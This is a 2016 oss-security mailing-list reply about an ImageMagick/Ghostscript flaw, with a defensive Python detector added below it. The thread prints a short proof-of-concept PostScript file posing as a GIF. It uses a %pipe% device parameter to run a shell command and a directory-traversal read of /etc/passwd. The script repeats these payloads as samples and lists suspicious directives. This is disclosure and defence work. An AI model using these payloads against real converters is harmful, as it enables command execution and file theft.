Message-ID: <CAJ_zFkJnFQuTGgRzkPhAV1x+eBnh3r7sXSs=9OMNNVMDUDorRg@mail.gmail.com>
Date: Fri, 30 Sep 2016 15:58:25 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: Florian Weimer <fw@...eb.enyo.de>
Cc: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Fri, Sep 30, 2016 at 2:11 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
> * Tavis Ormandy:
>>
>> $ cat test.gif
>> currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
>> .putdeviceparams
>> quit
>> $ convert test.gif png:test.png
>>
>> (Note: I don't know why it doesn't work on earlier versions, maybe
>> it's possible to make it work, or some other param will work)
>
> It still tries to open a file in earlier versions, with directory
> traversal:
>
> [pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5
>
> The %pipe%-based execution was introduced as a side effect of:
>

Thanks Florian! I took a look at where that directory comes from; I think
it pulls it from a userparam, like:

<< (ICCProfilesDir) (whatever) >> .setuserparams

That probably needs to be fixed. I wonder if there's a way to get that
directory to populate back into the PermitFileReading array?

Tavis.
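The two mechanisms discussed in this thread (a %pipe%-style device parameter reaching command execution, and an ICC profile path that is resolved relative to a user-controlled ICCProfilesDir and escapes via ../ because that directory is not in the permitted-read list) can be illustrated from the defender's side. The script below is an added example written for this archive page; it is not code from the thread, from Ghostscript or from ImageMagick. It does two things: a pre-screen that flags input handed to a Ghostscript-backed converter when it contains the directives quoted above, and a PermitFileReading-style check that canonicalises profiles_dir + requested profile name and only accepts the result if it stays under a fixed permitted root. The sample inputs, the function names and the /tmp/evil directory are constructed for the example.

```python
import os
import re

# Constructed sample modelled on the payload quoted in the thread (not the
# reporter's actual file): sets OutputICCProfile to a %pipe% device.
SAMPLE_PIPE = (
    b"currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)\n"
    b".putdeviceparams\n"
    b"quit\n"
)

# Constructed sample modelled on the userparam sketch in the reply above.
SAMPLE_USERPARAM = b"<< (ICCProfilesDir) (/tmp/evil) >> .setuserparams\n"

# Constructed benign PostScript: ordinary text rendering, no parameter tricks.
BENIGN_PS = (
    b"%!PS-Adobe-3.0\n"
    b"/Helvetica findfont 12 scalefont setfont\n"
    b"72 72 moveto (hello) show\n"
    b"showpage\n"
)

# Directives that ordinary image/document content never needs but that the
# thread shows being used to reach device/user parameters or the filesystem.
SUSPICIOUS = {
    "%pipe%": rb"%pipe%",                    # pipe device: output goes to a command
    ".putdeviceparams": rb"\.putdeviceparams",  # rewrites e.g. OutputICCProfile
    ".setuserparams": rb"\.setuserparams",      # rewrites e.g. ICCProfilesDir
    "OutputICCProfile": rb"OutputICCProfile",
    "ICCProfilesDir": rb"ICCProfilesDir",
    "path traversal": rb"\.\.[/\\]",            # ../ or ..\ component
}


def suspicious_directives(data):
    """Return the names of SUSPICIOUS patterns found in raw input bytes.

    Intended as a pre-screen in front of a converter that may hand the
    file to Ghostscript; an empty list means nothing in the list matched.
    """
    return [name for name, pattern in SUSPICIOUS.items() if re.search(pattern, data)]


def profile_path_is_permitted(profiles_dir, requested, permitted_roots):
    """PermitFileReading-style check for an ICC profile lookup.

    profiles_dir is the directory the interpreter would prepend (the value
    of ICCProfilesDir), requested is the profile name supplied by the
    document, permitted_roots is the fixed list of directories reads are
    allowed from.  The joined path is normalised first so that ../
    components (or an absolute 'requested', which os.path.join lets win)
    cannot escape the permitted roots.
    """
    candidate = os.path.normpath(os.path.join(profiles_dir, requested))
    for root in permitted_roots:
        root = os.path.normpath(root)
        if candidate == root or candidate.startswith(root + os.sep):
            return True
    return False


if __name__ == "__main__":
    for label, sample in (("pipe", SAMPLE_PIPE),
                          ("userparam", SAMPLE_USERPARAM),
                          ("benign", BENIGN_PS)):
        print(label, suspicious_directives(sample))

    roots = ["/usr/share/ghostscript/9.06/iccprofiles"]
    print(profile_path_is_permitted(roots[0], "sRGB.icc", roots))
    print(profile_path_is_permitted(roots[0], "../../../../../etc/passwd", roots))
    # Directory rewritten via .setuserparams: still rejected, because the
    # permitted roots are fixed rather than derived from the userparam.
    print(profile_path_is_permitted("/tmp/evil", "x.icc", roots))
```

The last call is the point of the "populate back into the PermitFileReading array" question: if the permitted-read list were derived from ICCProfilesDir, changing that userparam would change the policy; keeping the list fixed and checking the normalised path against it is what makes the traversal in the strace line fail.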
